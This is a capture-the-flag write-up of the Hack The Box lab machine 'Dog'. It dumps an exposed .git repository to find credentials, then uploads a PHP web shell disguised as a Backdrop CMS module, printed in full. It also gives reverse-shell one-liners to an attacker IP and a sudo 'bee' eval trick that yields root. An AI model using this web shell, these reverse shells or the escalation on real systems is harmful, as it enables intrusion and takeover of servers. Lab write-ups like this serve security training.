A writeup of the Hack The Box machine “Dog” with easy difficulty

HTB_Dog

Hi, welcome to this writeup of the Hack the Box machine Dog with easy difficulty.

nmap -sV -sC 10.10.11.58

Port 22 and 80 are open. On port 80 looks like a repository server.

The url for this repo is http://10.10.11.58/.git/ as we can see.

The nmap scan also showed us a bunch of directories from the robots.txt. Let’s go trough these and see if we cant find anything.

The site is a dog website btw:

There can be logged in at: http://10.10.11.58/?q=user/login

When changing the ?q=user to admin I get this:

So this does something.

Earlier i saw a log with the user in it: [email protected]

There is a strange encoded string in the http://10.10.11.58/.git/refs/heads/master 8204779c764abd4c9d8d95038b6d22b6a7515afa

While exploring the folders, I found that there is a settings.php page in the root folder. Entering this in the browser gives me a blank page.

Let’s try to download this file with git-dumper

pip install git-dumper

I got a permissions error in my python venv

sudo chown -R kali:kali /home/kali/HTB/Dog/dog

source /home/kali/HTB/Dog/dog/bin/activate pip install --upgrade pip setuptools wheel pip install git-dumper

Now we can use the git-dumper tool with:

git-dumper http://10.10.11.58/.git ~/dumped_repo

The folder /dumped_repo has to be already present

Now we can go into this dumped folder: cd ~/website

cat settings.php

BackDropJ2024DS2024

Now we have a password but we don’t know the user this belongs to

There can be a test user: test_username

Or backdrop found in the filetransfer.test with the password password

Or Tiffany in the database_test.txt file

Yes we are logged in.

There are more users:

There is a module upload functionality we can use to upload a malicious file to gain shell.

The structure of a Backdrop module is like this:

dogshell/ ├── dogshell.info └── dogshell.module

dogshell.info

name = DogShell
description = Backdoor shell access
type = module
backdrop = 1.x
package = Administration
version = 1.0

<?php
function dogshell_menu() {
  $items = array();
  $items['dogs'] = array(
    'title' => 'Dog Shell',
    'page callback' => 'dogs_eval',
    'access callback' => TRUE,
  );
  return $items;
}

function dogs_eval() {
  if (isset($_GET['cmd'])) {
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
  } else {
    echo "Use ?q=dogs&cmd=whoami";
  }
}
?>

Package this folder as .tar.gz

tar -czf dogshell.tar.gz dogshell/

Now enable this module.

And now test our own module:

http://10.10.11.58/?q=dogs&cmd=id

Haha yes it works.

Now let’s reverse shell:

http://10.10.11.58/?q=dogs&cmd=bash+-c+'bash+-i+&+/dev/tcp/10.10.14.91/6666+0>&1'>

With a nc listener: nc -lvnp 6666

Hmm this did not work.

I found this exploit: https://www.exploit-db.com/exploits/52021

Let’s copy this python code to a file on our machine and run it with:

python3 exploit.py http://dog.htb

Now there is a folder names shell

tar -czvf shell.tar.gz shell

Now upload this module once again.

Now go to this url (the shell address):

http://dog.htb/modules/shell/shell.php

Now get a reverse shell: bash -c "bash -i >& /dev/tcp/10.10.14.91/1234 0>&1"

python3 -c 'import pty;pty.spawn("/bin/bash")'<ll$ python3 -c 'import pty; pty.spawn("/bin/bash")’

export TERM=xterm

^z

stty raw -echo; fg

We now know the username

I got SSH with ssh [email protected] and the password we got earlier.

The user flag is in: /home/johncusack/user.txt

Privilege Escalation

Let’s check the sudo privileges with: sudo -l

This is interesting the /usr/local/bin/bee dir can run commands.

Bee is a program. Using ls -l shows us the permissions.

This is a symlink to /backdrop_tool/bee/bee.php .

ls -l /backdrop_tool/bee/bee.php to look at there permissions.

We can take a look inside this file: cat /backdrop_tool/bee/bee.php

Bee is a command line utility for Backdrop CMS apparently.

Bee uses the PHP function system() to run commands as root.

You can run this command to see if you can run commands as root on this path:

sudo /usr/local/bin/bee --root=/var/www/html eval "echo shell_exec('whoami && id');"

And yes we can.

Now we start a root shell with: sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash');"

Now going to /root we have a nice root.txt file